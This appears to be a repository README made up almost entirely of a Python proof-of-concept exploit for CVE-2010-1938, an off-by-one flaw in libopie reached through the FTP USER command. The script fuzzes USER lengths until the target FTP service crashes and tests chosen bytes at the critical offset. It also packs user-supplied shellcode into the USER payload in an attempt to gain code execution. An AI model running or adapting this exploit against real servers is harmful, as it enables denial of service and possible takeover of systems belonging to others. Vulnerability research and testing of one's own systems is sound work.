README.md
Rendering markdown...
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Improved PoC for CVE-2010-1938
Author: Nexxus67
"""
import argparse
from contextlib import closing
from dataclasses import dataclass
from itertools import cycle
import socket
import time
from typing import Optional, Tuple
# ----------------------------------------------------------------------
# Default configuration (can be modified via arguments)
DEFAULT_IP = "your-target-ip"
DEFAULT_PORT = 21
DEFAULT_TIMEOUT = 5
RECV_BUFFER = 1024
# ----------------------------------------------------------------------
PayloadResult = Tuple[Optional[bytes], Optional[bytes]]
@dataclass(frozen=True)
class TargetConfig:
"""Immutable configuration for the FTP target."""
ip: str
port: int = DEFAULT_PORT
timeout: float = DEFAULT_TIMEOUT
buffer_size: int = RECV_BUFFER
def decode_bytes(data: Optional[bytes]) -> str:
"""Safely decode bytes ignoring unexpected unicode errors."""
if not data:
return "(no data)"
return data.decode(errors="ignore").strip()
class ExploitClient:
"""Wraps the target configuration and common FTP helper routines."""
def __init__(self, config: TargetConfig) -> None:
self.config = config
def _open_socket(self, timeout: Optional[float] = None) -> socket.socket:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout if timeout is not None else self.config.timeout)
sock.connect((self.config.ip, self.config.port))
return sock
def send_payload(self, payload: bytes) -> PayloadResult:
"""Send a USER payload and return the banner and response."""
try:
with closing(self._open_socket()) as sock:
banner = sock.recv(self.config.buffer_size)
sock.sendall(b"USER " + payload + b"\r\n")
response = sock.recv(self.config.buffer_size)
return banner, response
except OSError as exc:
print(f"[-] Payload failed: {exc}")
return None, None
def is_service_alive(self, timeout: Optional[float] = None) -> bool:
"""Check if the FTP service accepts a connection within the timeout."""
try:
with closing(self._open_socket(timeout=timeout)):
return True
except OSError:
return False
def check_crash(client: ExploitClient, timeout: float = 2.0) -> bool:
"""Return True if the target refuses new connections (likely crashed)."""
return not client.is_service_alive(timeout=timeout)
def generate_pattern(length: int) -> bytes:
"""Produce a cyclic pattern for manual offset hunting."""
upper = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lower = b"abcdefghijklmnopqrstuvwxyz"
digits = b"0123456789"
pattern = bytearray()
for a, b, c in zip(cycle(upper), cycle(lower), cycle(digits)):
pattern.extend((a, b, c))
if len(pattern) >= length:
return bytes(pattern[:length])
return bytes(pattern)
def fuzz_length(client: ExploitClient, start: int = 200, end: int = 400, step: int = 1) -> Optional[int]:
"""Sweep username lengths and return the first size that crashes the service."""
print(f"[*] Fuzzing lengths from {start} to {end} (step {step})")
for size in range(start, end + 1, step):
payload = b"A" * size
print(f"[*] Testing length {size}... ", end="", flush=True)
banner, _ = client.send_payload(payload)
if banner is None:
print("[!] Unable to deliver payload. Stopping fuzzing.")
return None
if check_crash(client):
print("CRASH detected!")
return size
print("OK")
time.sleep(0.5)
print("[!] No crash detected in the tested range.")
return None
def test_critical_byte(client: ExploitClient, critical_length: int, byte: bytes = b"\x00") -> bool:
"""Exercise the off-by-one byte at the given length to see if it crashes."""
payload = b"A" * (critical_length - 1) + byte
print(f"[*] Testing critical byte: {byte.hex()} (length {critical_length})")
banner, response = client.send_payload(payload)
print(f"[+] Banner: {decode_bytes(banner)}")
if response:
print(f"[+] USER response: {decode_bytes(response)}")
if check_crash(client):
print("[!!!] CRASH detected! The critical byte affects the service.")
return True
print("[-] Service is still alive.")
return False
def send_shellcode(client: ExploitClient, shellcode: bytes, payload_length: int) -> None:
"""Embed the provided shellcode inside the USER payload for experimentation."""
if payload_length <= len(shellcode):
print("[-] Payload length must be larger than the shellcode size.")
return
payload = shellcode + b"A" * (payload_length - len(shellcode))
banner, response = client.send_payload(payload)
print(f"[+] Banner: {decode_bytes(banner)}")
print(f"[+] USER response: {decode_bytes(response)}")
if check_crash(client):
print("[!!!] Service crashed. Possible execution (context dependent).")
else:
print("[-] Service is still alive.")
def main() -> None:
parser = argparse.ArgumentParser(description="Improved PoC for CVE-2010-1938 (off-by-one in libopie)")
parser.add_argument("ip", nargs="?", default=DEFAULT_IP, help="FTP server IP")
parser.add_argument("-p", "--port", type=int, default=DEFAULT_PORT, help="FTP port (default: 21)")
parser.add_argument("--fuzz", action="store_true", help="Fuzzing mode: find length causing crash")
parser.add_argument("--byte-test", metavar="BYTE", help="Test a specific byte (e.g., 00, ff) at critical position")
parser.add_argument("--shellcode", metavar="FILE", help="File containing binary shellcode to send (experimental)")
parser.add_argument("--length", type=int, help="Payload length for --byte-test or --shellcode")
args = parser.parse_args()
client = ExploitClient(TargetConfig(ip=args.ip, port=args.port))
if args.fuzz:
print("[*] Fuzzing mode")
critical_length = fuzz_length(client)
if critical_length:
print(f"\n[+] Critical length found: {critical_length}")
elif args.byte_test:
if not args.length:
print("[-] --byte-test requires --length")
return
byte = bytes.fromhex(args.byte_test)
test_critical_byte(client, args.length, byte)
elif args.shellcode:
if not args.length:
print("[-] --shellcode requires --length")
return
with open(args.shellcode, "rb") as payload_file:
shellcode = payload_file.read()
send_shellcode(client, shellcode, args.length)
else:
print("[*] No specific arguments. Running quick test with typical lengths...")
lengths = [256, 257, 258, 300, 400]
for length in lengths:
payload = b"A" * length
print(f"\n[*] Testing length {length}")
banner, response = client.send_payload(payload)
print(f"[+] Banner: {decode_bytes(banner)}")
if response:
print(f"[+] Response: {decode_bytes(response)}")
if banner is None and response is None:
print("[!] Payload delivery failed during demo run. Stopping.")
break
if check_crash(client):
print("[!!!] CRASH detected!")
break
print("[-] Server responds normally.")
time.sleep(1)
if __name__ == "__main__":
main()